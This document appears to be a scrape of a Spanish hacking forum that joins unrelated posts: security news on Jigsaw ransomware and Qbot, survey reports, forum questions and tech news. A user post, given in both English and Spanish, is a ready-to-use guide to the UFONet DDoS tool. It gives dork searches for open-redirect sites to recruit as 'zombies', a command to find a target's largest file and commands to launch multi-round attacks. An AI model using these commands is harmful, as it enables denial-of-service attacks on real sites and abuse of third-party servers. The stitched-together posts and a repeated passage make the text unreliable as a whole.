Saludos,

Perdonadme por la ingenuidad, pero me gustaría saber si los gadget de escritorio que muestran las estadisticas del pc consumen muchos recursos, nunca he usado uno.

Me refiero a algo similar a esto:

Mi escritorio:

El ransomware es el tipo de malware más peligroso de los últimos años. Este tipo de malware, por desgracia, fuera de control, cifra los datos de los usuarios y pide el pago de un rescate a los usuarios a cambio de la clave con la que recuperar el acceso a ellos. Los piratas informáticos cada vez buscan nuevas formas de chantajear a los usuarios para que paguen dicho rescate, lo que, finalmente, ha desencadenado en un nuevo ransomware que, tal como temíamos, borra los archivos si no se paga para evitar su recuperación.


Jigsaw es un nuevo ransomware que, como otras variantes similares, cifra todos los datos de los usuarios a los que infecta para, después, pedir el pago de un rescate a cambio de recuperar el acceso a los datos. Este malware reconoce más de 225 tipos de archivos diferentes, utiliza un algoritmo AES para el cifrado y los ficheros resultantes tienen la extensión .fun. Hasta aquí todo correcto, nada diferente con otros malware similares, sin embargo, esto no acaba aquí.

Este ransomware pide el pago de 0.4 Bitcoin (alrededor de 150 euros) por la clave de descifrado. Un pago bastante por debajo que el que piden variantes similares, sin embargo, este ransomware informa de que, cada hora, si no se paga el rescate se eliminarán varios ficheros secuestrados de forma aleatoria. Cada hora que pasa, el ransomware irá eliminando cada vez más archivos, incluso si el usuario reinicia, algunas víctimas reportan que ha llegado a eliminar más de 1000 archivos.

Lo que todos temíamos ha llegado: el primer ransomware que, además de cifrar los datos, los elimina si no paga el rescate a los piratas informáticos. ¿Hasta dónde vamos a llegar?

Los archivos cifrados por Jigsaw se pueden recuperar

Por suerte, las víctimas de Jigsaw aún tienen un pequeño rayo de esperanza, y es que investigadores de seguridad han publicado una sencilla herramienta con la que poder recuperar los datos secuestrados por él.


Esta herramienta, desarrollada por Bleeping Computer, se puede descargar de forma gratuita desde el siguiente enlace. Algunos antivirus la detectan como aplicación sospechosa, pero, igual que el resto de aplicaciones de estos investigadores de seguridad, es totalmente fiable y, además, totalmente efectiva para recuperar los datos de este ransomware.

Como hemos dicho, este es el primer ransomware que, para forzar a los usuarios a pagar cuanto antes, borra los archivos cifrados, perdiéndolos así para siempre. Un hecho más que preocupante ya que, probablemente, otros piratas informáticos comenzarán a incluir dicha característica en sus piezas maliciosas.

Como siempre, y ahora más que nunca, recomendamos crear copias de seguridad de todos los archivos importantes y guardarlas estas en un disco o unidad desconectada del ordenador de manera que, si caemos víctimas de este u otro ransomware, podamos recuperar los datos sin pagar.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un grupo de expertos en seguridad de BAE Systems ha desvelado que una versión renovada y mejorada del malware Qbot está de vuelta. Seguramente a muchos este malware ya les sonará, puesto que apareció por primera vez en 2009 para ser posteriormente detectado por Symantec.

Un malware que también es conocido como Qakbot y que se encarga de robar datos o información de los equipos infectados. Pues bien, casi siete años después Qbot ha reaparecido y aunque se trata de una variante mejorada, deriva directamente del código fuente original de Qbot.


Y es que ahora este malware, además de contar con las capacidades que ya tenía en 2009, donde ya era un gusano capaz de robar datos de los equipos infectados con capacidades de puerta trasera, llega con nuevas características en las que destaca una técnica de evasión avanzada.

Esto significa que el propio malware puede detectar si está siendo observado o seguido en un sandbox, herramienta usada por los investigadores para detectar amenazas antes de que comiencen a causar daños a los usuarios. Esto hace que la nueva versión de Qbot sea aún más peligrosa, puesto que puede distribuirse rápidamente antes de que pueda ser detectado por este tipo de herramientas. Algo que ha sido conseguido gracias a un código polimórfico que hace que sea más difícil de detectar.

De esta manera, según se detalla en un informe elaborado por los investigadores de BAE Systems, este malware ya ha conseguido infectar a más de 54 millones de ordenadores en miles de organizaciones y a usuarios de todo el mundo, aunque el mayor porcentaje de afectados es de Estados Unidos.

Los ciberdelincuentes responsables de esta nueva oleada de Qbot se han fijado como principales objetivos algunas organizaciones públicas, departamentos de policía, hospitales o universidades entre otros. Aunque este gusano es capaz de infectar a ordenadores con cualquier versión del sistema operativo Windows, especialmente ha demostrado hacer daño a aquellos que cuenta con Windows XP, puesto que ha provocado que no se puedan reiniciar nuevamente.

Este malware parece que se está distribuyendo a través de numerosos sitios web comprometidos y gracias a su capacidad de ir cambiando para evadir el software utilizado para su detección por parte de los investigadores, la amenaza se está extendiendo rápidamente, consiguiendo afectar a un gran número de equipos.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You can read this post on spanish language: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Maybe a lot of people know about this tool, but i don´t found nothing about it on the forum, and it is the reason of this post.

Briefly, UFONet is a DDoS tool, that exploit the Open Redirect vulnerability on third party web applications like botnet.
The Open Redirect vulnerability allows the attacker to perform redirection to the target that he choose, because that redirection is on a variable that the user can control.

I think that this tool is curious and easy to use, it found a useful  and creative way to exploit Open Redirect vulnerability.


--Help:

Options:
  --version                                               show program's version number and exit
  -h, --help                                              show this help message and exit
  -v, --verbose                                         active verbose on requests
  --update                                               check for latest stable version
  --check-tor                                           check to see if Tor is used properly
  --force-yes                                           set 'YES' to all questions
  --disableisup                                          disable external check of target's status
  --gui                                                    run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY                                    Use proxy server (tor: 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')
    --user-agent=AGENT                             Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER                                Use another HTTP Referer header (default SPOOFED)
    --host=HOST                                       Use another HTTP Host header (default NONE)
    --xforw                                               Set your HTTP X-Forwarded-For with random IP values
    --xclient                                             Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT                              Select your timeout (default 10)
    --retries=RETRIES                                 Retries when the connection timeouts (default 1)
    --threads=THREADS                              Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY                                     Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH                                           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS                                         Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS                              Set max number of results for engine (default 10)
    --se=ENGINE                                        Search engine to use for 'dorking' (default: duck)
    --sa                                                   Search massively using all search engines

  *Test Botnet*:
    -t TEST                                              Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me                                        Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies                              Download 'zombies' from Community server: Turina
    --upload-zombies                                  Upload your 'zombies' to Community server: Turina
    --blackhole                                          Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP                                       Upload your 'zombies' to a 'blackhole'
    --down-from=DIP                                  Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT                                           Search for biggest file (ex: -i 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')

  *Configure Attack(s)*:
    --disable-aliens                                     Disable 'aliens' web abuse of test services
    --disable-isup                                       Disable check status 'is target up?'
    -r ROUNDS                                           Set number of rounds (default: 1)
    -b PLACE                                             Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET                                           Start Web DDoS attack (ex: -a 'http(s):You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')


Attack method:

#Searching for 'zombies':

For perform DDoS attack using UFONet, first of all we must collect websites that are vulnerable to Open Redirect (zombies). For it, we must use specific Dorks. The tool include a wordlist called dorks.txt where we can find some useful parameters such as "proxy.php? Url =" or "validator? Uri =".

-Search by parameter:

./ufonet -s 'proxy.php?url='

-Search by dorks list:

./ufonet -s 'proxy.php?url='

-Select search engine between google, duck, yahoo, yandex y bing:

./ufonet -s 'proxy.php?url=' --se 'bing'

-Select all search engine:

./ufonet -s 'proxy.php?url=' --sa 

-Control how many 'zombies' recieve from search engines you can use:

  ./ufonet --sd 'dorks.txt' --sa --sn 20

-At the end of the process, you will be asked if you want to check the list retrieved to see
  if the urls are vulnerable:

 Wanna check if they are valid zombies? (Y/n)

- Also, you will be asked to update the list adding automatically only 'vulnerable' web apps:

Wanna update your list (Y/n)

#Testing botnet:

-Launch test:

 ./ufonet -t zombies.txt

-Order to 'zombies' to attack you:

 ./ufonet --attack-me 

#Inspecting a target:

-This feature will provides you the biggest file on target:

./ufonet -i http://target.com

- You can use this when attacking to be more effective:

./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

#Attacking a target:

-Enter a target to attack with a number of rounds (1 round by default):

./ufonet -a http://target.com -r 10

These are the basic options of UFONet, it have more advanced functions like use proxy. Is possible to use the tool with a GUI wiht the command:

./ufonet --gui

Spanish post: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Official site: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Regards, hati 

Gran aporte @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Te dejo la traducción correcta de la fuente original por si quieres modificar:

CitarEste es el curso más avanzado del mundo sobre Hacking Ético, con 18 de las técnicas de seguridad más usadas que cualquier hacker necesita conocer para reforzar la seguridad de su organización. En 18 módulos exhaustivos, el curso cubre 270 metodologías de ataque normalmente usadas por los hackers.

Nuestros expertos en seguridad han diseñado más de 140 laboratorios que imitan escenarios en tiempo real para que puedas "vivir" un ataque como si fuese real y proporcionandote acceso a más de 2200 herramientas de hacking comunes para introducirte en el mundo de los hackers.

El experto en seguridad Mike Olsen ha avisado de la presencia de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Olsen ha estado buscando cámaras de vigilancia que quería comprar para la casa de un amigo, encontrando una interesante oferta en Amazon para adquirir seis cámaras PoE para exteriores y un equipo de grabación.



Una vez en posesión de las cámaras, instaló el software de control en el ordenador de su amigo, al cual accedió a través de la página web de administrador que incorpora. Olsen vio que podía ver la alimentación de las cámaras, pero ninguno de los controles y configuraciones normales de este tipo de productos.

Olsen se puso a comprobar a través de las herramientas para desarrolladores del navegador si había algún fallo en el código HTML o CSS que estuviese provocando el error, encontrando una etiqueta correspondiente a un iframe de HTML que enlazaba a un sitio web sospechoso.


Una vez en posesión de las cámaras, instaló el software de control en el ordenador de su amigo, al cual accedió a través de la página web de administrador que incorpora. Olsen vio que podía ver la alimentación de las cámaras, pero ninguno de los controles y configuraciones normales de este tipo de productos.

Olsen se puso a comprobar a través de las herramientas para desarrolladores del navegador si había algún fallo en el código HTML o CSS que estuviese provocando el error, encontrando una etiqueta correspondiente a un iframe de HTML que enlazaba a un sitio web sospechoso.


El investigador encontró la URL You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, que le resultó bastante sospechosa. Tras investigarla en Google comprobó que correspondía a un dominio malicioso utilizado para actividades fraudulentas, incluyendo ataques basados en malware, siendo este un dato que ha sido confirmado tanto por Virus Total como Sucuri. Olsen decidió avisar en su blog de los peligros de este producto porque por entonces tenía una buena valoración (por suerte tras destaparse esto ha caído en picado) y está a buen precio.

Tristemente este caso no es único, porque un usuario ha encontrado You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es una empresa especializada en la detección y mitigación de bots que recientemente ha lanzado su tercer informe anual sobre la actividad de este tipo de software en Internet.

En el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login se menciona que en 2015 el 54,4% de todo el tráfico web está generado por humanos, mientras que los bots benignos representaron el 27% y los bots maliciosos el 18,6%. Esto quiere decir que el 45,6% del tráfico total lo generaron bots.


Según Distil Networks, los humanos volvieron a ser en 2015 los principales generadores de tráfico en la web tras perder esa posición en 2014, cuando los bots acumularon el 59,1% de todo el tráfico generado. Además también avisa del aumento de la presencia de los Bots Persistentes Avanzados (APB), que representaron el 88% del tráfico de los bots maliciosos.


Los bots modernos se pueden hacer pasar por humanos

Los APB son capaces de imitar el comportamiento y las respuestas humanas a través una amplia gama de operaciones técnicas que anteriormente se consideraban demasiado complejas como para ser introducidas en un software de estas características.

La lista de operaciones técnicas incluyen la posibilidad de cargar JavaScript, cargar activos externos, manipular cookies, realizar tareas automáticas en navegadores web, engañar con la dirección IP e incluso utilizar user agents personalizados. Además los APB son capaces de cambiar su IP dinámicamente para evitar su detección, incluyendo aquí la red Tor y servicios de proxies.

Según la empresa, el 53% de estos bots pueden cargar JavaScript, el 36% cambiar el user agent, el 39% imitar la interacción humana con una página web y el 73% puede ocultar su IP de origen. Centrándonos en los APB que tienen esta última característica, algunos han sido capaces de utilizar 100 IP diferentes por cada campaña.

¿Por quiénes se hacen pasar los bots maliciosos?

Si en 2014 los bots maliciosos preferían hacerse pasar por Firefox, con Google Chrome pisándole los talones, en 2015 el user agent de Google Chrome ha sido el más empleado con gran diferencia, acumulando el 26,9% del tráfico, mientras que Firefox descendió del 26,62% hasta el 17,67%. Otro que ha experimentado un gran aumento ha sido Safari, que se cuela en el ranking con el 5,01%.

La mayoría del tráfico generado procede de Estados Unidos, sobre todo la infraestructura AWS de Amazon, sobre la cual los bots representaron el 31% del tráfico total en 2015. Mientras que en la industria editorial los bots representaron el 31% del tráfico durante ese año, con un crecimiento a nivel cuantitativo del tráfico generado por bots del 300%.


Las personas interesadas pueden obtener todo el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Logindesde el sitio web de Distil Networks.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¿Cuanto de imprudentes son los usuarios a la hora de conectar unidades USB de procedencia desconocida? Según un You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login del que se han hecho eco en Motherboard, los usuarios son aparentemente mucho más descuidados de lo que tendrían que ser.

El estudio consistió en un experimento en el cual soltaron 297 unidades USB en el campus Urbana-Champaign durante el año pasado, obteniendo los investigadores unos resultados más bien preocupantes. Las unidades USB no tenían ningún malware, pero sí contenían una encuesta construida con HTML para poder averiguar el patrón comportamiento de aquellos usuarios que cogían las unidades USB de procedencia desconocida.


Los investigadores han estimado que el 48% de los usuarios que hallaron una unidad USB perdida decidieron conectarla a su ordenador y abrir los ficheros que contenía. Además el 98% de las unidades USB fueron al menos movidas de su posición original, indicando que las unidades USB perdidas despiertan la curiosidad de quienes las encuentran. De todas las personas que decidieron conectar las unidades USB, el 68% de estas lo hicieron sin tomar ninguna precaución, una práctica bastante peligrosa e imprudente independientemente del sistema operativo que se esté utilizando.

Por otro lado, el 68% de las personas que cogieron un dispositivo USB respondieron que lo conectaron con el fin de averiguar quién es el dueño legítimo del dispositivo, mientras que solo el 18% reconoció haberlo hecho por simple curiosidad. Y es que además de los problemas de seguridad, dejar perdido un pendrive con contenidos sensibles también puede tener consecuencias desastrosas.

Otro dato preocupante es que muchos alumnos han "confiado en las defensas de su MacBook" para evitar infecciones y ataques, mientras que otros decidieron "sacrificar una computadora de la universidad".

Viendo que el estudio se hizo dentro de un entorno universitario, lo lógico es pensar que los alumnos tienen información sobre lo peligroso que es coger una unidad USB de procedencia desconocida, sin embargo, parece que a pesar de la abundancia de información no se está consiguiendo concienciar a la gente.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, Volumen 21, ha revelado la existencia de una tendencia organizada por parte de los ciberdelincuentes: están adoptando las mejores prácticas corporativas y estableciendo negocios profesionales para incrementar la eficiencia de sus ataques dirigidos contra empresas y consumidores. Esta nueva clase de cibercriminales profesionales abarca todo el ecosistema de atacantes, ampliando el alcance de las amenazas para empresas y consumidores e impulsando el crecimiento de los delitos online.

Los grupos de ataque profesionales avanzados son los primeros en aprovechar las vulnerabilidades de día cero, utilizándolas para su propio beneficio o vendiéndolas a otros delincuentes de menor nivel en el mercado abierto, donde rápidamente se convierten en productos de consumo. En 2015, el número de vulnerabilidades de día cero descubiertas se duplicó hasta alcanzar el récord de 54, un incremento del 125% respecto al año anterior, confirmando el papel crítico que juegan en los ataques dirigidos con fines de lucro. Al mismo tiempo, el malware creció a un asombroso ritmo, con 430 millones de nuevas variantes de malware descubiertas en 2015. El creciente volumen de malware prueba que los ciberdelincuentes profesionales están aprovechando sus enormes recursos para intentar derribar y entrar en las redes corporativas.

En 2015, España se convirtió en el 19º país a nivel mundial, y el octavo en Europa, como fuente de ciberamenazas. Por lo que se refiere al ransomware, España está incluso en puestos más altos dentro de los rankings globales, ocupando la decimocuarta posición con más de 107.000 amenazas de este tipo detectadas, casi 300 al día. Los ataques dirigidos continúan llevándose a cabo en el país, la mayor parte de ellos contra pequeñas y medianas empresas, con un 70% de pymes afectadas. Los servicios, así como la banca y la industria de seguros, son los sectores a los que más se dirigen los ataques, contabilizando más del 80 % del total. Los españoles también son objetivo de las estafas en redes sociales. Destaca el hecho de que las ofertas falsas representan una alta proporción entre todas las amenazas de redes sociales detectadas, contabilizando casi el 40% de todas las registradas, casi tantas como las que se comparten individualmente.

Además, las fugas de datos continúan impactando en la empresa. De hecho, las grandes empresas que son objetivo de ataques lo serán, de media, tres veces más a lo largo del año. En 2015 fuimos testigos de la mayor fuga de datos hecha pública, con 191 millones de registros comprometidos en un único incidente. Hubo también un récord total de nueve mega fugas. Aunque se vieron expuestas 429 millones de identidades, el número de empresas que eligen no informar sobre el número de registros perdidos subió hasta el 85%. Una estimación conservadora desde Symantec respecto a estas fugas no declaradas sitúa el número real de registros perdidos por encima de los 500 millones.

Por su parte, el ransomware también ha seguido evolucionando en 2015, y el tipo más dañino de ataques de ransomware encriptado (crypto-ransomware) ha crecido un 35%. Estos ataques de crypto-ransomware más agresivos encriptan todos los contenidos digitales de la víctima y los guardan hasta que se paga por el rescate. Este año, el ransomware pasó de los PCs a los smartphones, y a los sistemas Mac y Linux, ya que los atacantes están cada vez más interesados en cualquier dispositivo conectado a una red que pueda ser secuestrado para su beneficio, lo que indica que las empresas son el siguiente objetivo.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos, antes de la noticias les dejo una pequeña reflexión personal:

Después de todo el dilema que se generó, el FBI lo hace sin ayuda de Apple. En mi opinión, y seguro que también la de muchos, solo intentaban tener posible acceso a la privacidad de los usuarios de la manzana, y ante la You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y las You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no les ha quedado otra que hacerlo con sus propios medios. Seguro que esta noticia no tiene tanta repercusión como las demás. Aqui se la dejo:



El Buró Federal de Investigación (FBI) de EEUU pagó a un grupo de 'hackers' profesionales para que le ayudasen a acceder al teléfono iPhone utilizado por el autor del tiroteo en la localidad californiana de San Bernardino en diciembre pasado que se cobró la vida de 14 personas.

Según publicó hoy el Washington Post, que citó fuentes policiales no identificadas, el FBI contactó con los piratas informáticos, que hallaron un defecto de software no conocido hasta entonces y facilitaron la información a los agentes para que estos creasen una pieza de hardware que les permitió acceder al teléfono.

El método permitió a los investigadores flanquear el código personal de cuatro dígitos sin activar un mecanismo de seguridad usado por Apple, fabricante del dispositivo, que hubiese eliminado todo el contenido del teléfono en caso de introducir códigos incorrectos más de 10 veces.

Al grupo de 'hackers' profesionales, que habitualmente colaboran con el Gobierno estadounidense, se les pagó una cantidad no revelada.

El FBI accedió al teléfono de Rizwan Farook, responsable junto a su esposa Tashfeen Malik de la muerte de 14 personas en diciembre en California, después de un largo litigio legal y de que Apple se negase a prestar su ayuda.

La compañía alegaba que, de acceder a la demanda del Gobierno, ponía en riesgo la privacidad de todos sus dispositivos.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

No me había fijado en la pestaña de "Programación General"    Y ahora que lo dices ya habia estado en el el subforo de Programación General jajaja aun así, no conocía exactamente la diferencia sobre lenguajes de scripting y lenguages de programación y me he informado sobre ello.

Gracias por la respuesta You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Saludos, es una duda simple:

¿Por que el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login no aparece en el índice de Programación Scripting?

Creo que sería buena idea añadirlo, ya que, añado: el buscador del foro no realiza una busqueda correcta al introducir c++

Creo que podría tratarse de un bug del buscador.
Hati, 

Puedes leer este post en inglés: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Seguro que muchos de vosotros ya lo conoceis debido a que se trata de una herramienta con cierto tiempo, pero no encontre nada sobre ella en el foro y por este motivo he decidido escribir el post.

Resumiendo, UFONet es una herramienta para realizar ataques DDoS, que aprovecha la vulnerabilidad Open Redirect en aplicaciones web de terceros y actúa de forma similar a una botnet.
La vulnerabilidad Open Redirect permite al atacante realizar una redirección al lugar que él escoga, debido a que dicha redirección se encuentra en una variable que el usuario puede controlar.

Creo que se trata de una herramienta curiosa y facil de usar, que ha buscado una forma útil y poco vista de explotar esta vulnerabilidad.

--Help:

Options:
  --version                                               show program's version number and exit
  -h, --help                                              show this help message and exit
  -v, --verbose                                         active verbose on requests
  --update                                               check for latest stable version
  --check-tor                                           check to see if Tor is used properly
  --force-yes                                           set 'YES' to all questions
  --disableisup                                          disable external check of target's status
  --gui                                                    run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY                                    Use proxy server (tor: 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')
    --user-agent=AGENT                             Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER                                Use another HTTP Referer header (default SPOOFED)
    --host=HOST                                       Use another HTTP Host header (default NONE)
    --xforw                                               Set your HTTP X-Forwarded-For with random IP values
    --xclient                                             Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT                              Select your timeout (default 10)
    --retries=RETRIES                                 Retries when the connection timeouts (default 1)
    --threads=THREADS                              Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY                                     Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH                                           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS                                         Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS                              Set max number of results for engine (default 10)
    --se=ENGINE                                        Search engine to use for 'dorking' (default: duck)
    --sa                                                   Search massively using all search engines

  *Test Botnet*:
    -t TEST                                              Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me                                        Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies                              Download 'zombies' from Community server: Turina
    --upload-zombies                                  Upload your 'zombies' to Community server: Turina
    --blackhole                                          Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP                                       Upload your 'zombies' to a 'blackhole'
    --down-from=DIP                                  Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT                                           Search for biggest file (ex: -i 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')

  *Configure Attack(s)*:
    --disable-aliens                                     Disable 'aliens' web abuse of test services
    --disable-isup                                       Disable check status 'is target up?'
    -r ROUNDS                                           Set number of rounds (default: 1)
    -b PLACE                                             Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET                                           Start Web DDoS attack (ex: -a 'http(s):You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')


Método de ataque:

#Busqueda de zombies:

Para realizar un ataque DDoS mediante UFONet, primero debemos recolectar sitios web que sean vulnerables a Open Redirect (zombies). Para ello hay que usar determinados Dorks. La herramienta incluye un wordlist llamado dorks.txt donde podemos encontrar algunos parámetros útiles como "proxy.php?url=" o "validator?uri=".

-Buscar con un parámetro:

./ufonet -s 'proxy.php?url='

-Buscar con una lista de dorks:

./ufonet -s 'proxy.php?url='

-UFONet permite seleccionar el motor de búsqueda entre google, duck, yahoo, yandex y bing:

./ufonet -s 'proxy.php?url=' --se 'bing'

-Buscar en todos los motores de búsqueda:

./ufonet -s 'proxy.php?url=' --sa 

-Controlar el número máximo de "zombies" como resultado:

  ./ufonet --sd 'dorks.txt' --sa --sn 20

-Tras la búsqueda se nos pregunta si queremos comprobar si las urls "zombie" encontradas son realmente vulnerables:

 Wanna check if they are valid zombies? (Y/n)

-Tras el chequeo, se nos pregunta si queremos actualizar la lista de "zombies" añadiendo los nuevos sitios vulnerables a Open Redirect:

Wanna update your list (Y/n)

#Probando la botnet:

-Lanzar test:

 ./ufonet -t zombies.txt

-Lanzar ataque a ti mismo:

 ./ufonet --attack-me 

#Inspeccionando un objetivo:

-Con esta opción encontrarás el fichero de mayor tamaño en el objetivo:

./ufonet -i http://target.com

-Usar el resultado con el fin de realizar ataques más efectivos:

./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

#Atacando un objetivo:

-Introduce objetivo para atacar un número determinado de rondas (por defecto 1 ronda)

./ufonet -a http://target.com -r 10

Estas son las opciones básicas de UFONet, aparte trae otras funciones más avanzadas como el uso de proxy. También es posible usar la herramienta mediante una interfáz gráfica con el comando: 

./ufonet --gui

Post en inglés: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Página oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo, hati 

El mecanismo es aplicable para smart cities, IoT y seguridad y es capaz de almacenar patrones recogidos en los datos y predecir cuándo se repetirán.

Investigadores de la Escuela Técnica Superior de Ingenieros Informáticos de la You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login han desarrollado un sistema que aprende del contexto y detecta, genera, almacena y reutiliza los patrones recogidos en los datos ya analizados previamente en tiempo real y que no han podido ser almacenados, precisamente por su ingente cantidad. Mediante este sistema, se puede predecir el momento en el que estos patrones volverán a aparecer e identificar cambios en el contexto que ayuden a detectar fraudes o spam.



"Nuestro trabajo se centra en un ámbito que es punta de lanza en materia de minería de datos, en data streams", explica Ernestina Menasalvas, del Departamento de Lenguajes y Sistemas Informáticos e Ingeniería del Software de la UPM. "El sistema permite optimizar el desarrollo de modelos de clasificación de minería de datos reutilizando modelos similares en contextos parecidos. Todo ello mejora las capacidades de aplicar la inteligencia artificial a entornos como ciudades inteligentes, Internet de las cosas, o dispositivos móviles".

El mecanismo tiene aplicaciones en materia de ciberseguridad, donde la herramienta permitirá detectar patrones similares y prever ataques cibernéticos, mejorando los sistemas de detección y respuesta. También podría aplicarse a la detección de intrusiones y fraudes por vías informáticas y al desarrollo de filtros antispam.

Los cambios de contexto pueden estar originados por hechos conocidos, como aquellos asociados a la climatología o a la estación del año, o provenir de aspectos desconocidos a priori. Para predecirlos, los investigadores de la UPM desarrollaron una función de similitud basada en técnicas de lógica difusa que extiende el comportamiento básico de decisión sí/no. "Una vez que la función determina si existen modelos de clasificación equivalentes para tratar el nuevo contexto, el sistema puede aplicar los mismos de forma directa gracias a su almacenamiento previo en un repositorio", explica Miguel Ángel Abad, autor de la tesis en la que se exponen los resultados de este trabajo.

El ahorro de recursos es otra de las ventajas que supone este sistema. "Adelantarnos al modo en que se van a comportar los datos supone un ahorro en los recursos computacionales de los dispositivos, por lo que este mecanismo es de aplicación a entornos ubicuos, caracterizados por la existencia de distintos dispositivos que operan en tiempo real y con recursos limitados", explica Miguel Ángel Abad.

Los resultados de este trabajo se han publicado en la revista especializada Expert Systems With Applications Journal, una publicación de referencia sobre sistemas inteligentes y su aplicación en diferentes campos.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Os traigo para aquellos que no lo conozcais, el proyecto HackerStrip. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login inició este proyecto en febrero de 2014 pensando en la idea  de que existe poco ocio para los hackers. El argentino Santa hace los dibujos y Raak se encarga de los "storyboards", los guiones y la promoción: "Los investigadores nos mandan sus historias y nosotros las editamos y añadimos algo de ficción".

En sus historias, los protagonistas son Charlie Miller y Chris Valasek, que You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, Mikko Hypponen y Xylitol, considerados los mejores expertos en virus,  Ross Ulbricht, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login... estos y otros personajes más viviran aventuras basadas en hechos reales, mezclandolas con toques de ficción. ¿Qué parte es verdad y qué parte es mentira? Esto queda a la elección del lector.




El principal problema del lector es el sustento económico, aunque algunos opinan que HackerStrip no ha sabido venderse bien, yo pienso que es porque se ha centrado más en el aspecto creativo. Aún así, el proyecto sigue en pie y cada cierto tiempo siguen sacando nuevas historias.

Puedes encontrar los comics en las siguientes páginas:

Página oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Página secundaria: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Indiegogo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

No soy el autor del post pero muchas gracias por esos diccionarios @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, un buen aporte para descargar.

George Hotz es el fundador de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, una startup de coches autónomos que apenas tiene seis meses. El lunes, la gran firma de capital de riesgo Andreessen Horowitz anunció una inversión de 3,1 millones de dólares a la naciente compañía.



Comma.ai está trabajando en un kit que hará posible convertir vehículos comunes en semi-autónomos. En octubre, Hotz compró un Acura ILX 2016, cámaras GoPro y empezó a desarrollar la tecnología en su cochera en San Francisco.

La meta es llevar el kit al mercado –tanto el programa de visión por computadora como las cámaras– por menos de 1.000 dólares cada uno antes de finales de 2016.

Será relativamente sencillo de instalar, dijo Hotz, "casi como ensamblar un mueble de IKEA".

